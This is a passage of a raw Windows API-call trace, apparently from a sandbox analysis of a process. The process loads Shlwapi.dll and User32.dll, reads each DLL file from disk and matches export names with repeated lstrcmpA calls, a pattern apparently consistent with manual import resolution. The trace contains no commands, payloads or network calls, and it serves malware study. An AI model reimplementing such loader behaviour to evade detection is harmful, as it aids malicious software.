lpString2="DavDeleteConnection") returned 1 [0168.553] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0168.553] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0168.553] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0168.553] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0168.553] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0168.553] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0168.553] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0168.560] GetProcessHeap () returned 0x450000 [0168.560] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2d45030 | out: hHeap=0x450000) returned 1 [0168.560] GetProcessHeap () returned 0x450000 [0168.560] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x469140 [0168.560] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0168.560] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0168.561] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0168.561] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0168.561] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0168.561] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0168.562] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0168.562] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0168.562] GetProcessHeap () returned 0x450000 [0168.562] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x51148) returned 0x2d45030 [0168.562] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0168.562] ReadFile (in: hFile=0x17c, lpBuffer=0x2d45030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d45030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0168.567] CloseHandle (hObject=0x17c) returned 1 [0168.568] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0168.568] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0168.568] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0168.568] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0168.568] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0168.568] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0168.568] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0168.568] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0168.568] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0168.568] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0168.568] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0168.568] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0168.568] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0168.568] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0168.568] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0168.568] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0168.569] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0168.569] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0168.569] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0168.569] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0168.570] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0168.570] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0168.570] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0168.570] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0168.570] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0168.570] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0168.570] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0168.570] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0168.570] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0168.570] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0168.570] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0168.570] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0168.570] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0168.570] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0168.570] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0168.570] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0168.570] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0168.571] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0168.571] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0168.571] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0168.571] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0168.571] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0168.571] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0168.571] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0168.571] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0168.571] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0168.571] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0168.571] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0168.571] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0168.571] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0168.572] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0168.572] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0168.572] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0168.572] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0168.572] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0168.572] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0168.572] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0168.573] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0168.573] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0168.573] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0168.573] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0168.573] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0168.573] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0168.573] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0168.573] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0168.573] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0168.573] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0168.573] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0168.573] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0168.573] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0168.573] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0168.573] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0168.573] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0168.573] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0168.574] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0168.574] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0168.574] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0168.574] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0168.574] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0168.574] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0168.574] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0168.574] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0168.574] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0168.574] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0168.574] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0168.574] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0168.574] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0168.574] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0168.574] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0168.574] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0168.574] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0168.574] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0168.574] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0168.574] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0169.145] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0169.145] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0169.145] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0169.145] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0169.145] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0169.145] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0169.145] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0169.145] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0169.145] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0169.145] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0169.145] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0169.145] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0169.145] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0169.145] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0169.145] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0169.145] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0169.145] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0169.145] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0169.146] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0169.146] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0169.146] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0169.146] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0169.146] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0169.146] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0169.146] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0169.146] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0169.146] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0169.146] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0169.146] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0169.146] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0169.146] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0169.146] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0169.146] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0169.146] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0169.146] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0169.146] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0169.146] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0169.146] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0169.146] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0169.146] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0169.146] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0169.146] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0169.146] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0169.146] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0169.146] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0169.147] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0169.147] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0169.147] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0169.147] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0169.147] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0169.147] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0169.147] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0169.147] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0169.147] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0169.147] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0169.147] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0169.147] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0169.147] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0169.147] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0169.147] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0169.147] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0169.147] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0169.147] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0169.147] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0169.148] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0169.148] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0169.148] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0169.148] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0169.148] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0169.148] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0169.148] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0169.148] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0169.148] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0169.148] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0169.148] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0169.148] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0169.148] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0169.148] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0169.148] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0169.148] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0169.148] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0169.148] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0169.148] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0169.148] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0169.148] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0169.148] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0169.148] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0169.148] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0169.149] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0169.150] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0169.150] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0169.150] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0169.150] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0169.150] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0169.150] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0169.150] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0169.150] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0169.150] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0169.150] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0169.150] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0169.150] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0169.150] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0169.150] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0169.150] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0169.150] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0169.150] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0169.151] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0169.151] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0169.151] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0169.151] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0169.151] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0169.151] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0169.171] GetProcessHeap () returned 0x450000 [0169.171] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2d45030 | out: hHeap=0x450000) returned 1 [0169.171] GetProcessHeap () returned 0x450000 [0169.171] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x469060 [0169.171] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0169.172] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0169.172] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0169.172] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0169.172] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0169.173] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0169.173] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0169.173] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0169.173] GetProcessHeap () returned 0x450000 [0169.173] RtlAllocateHeap 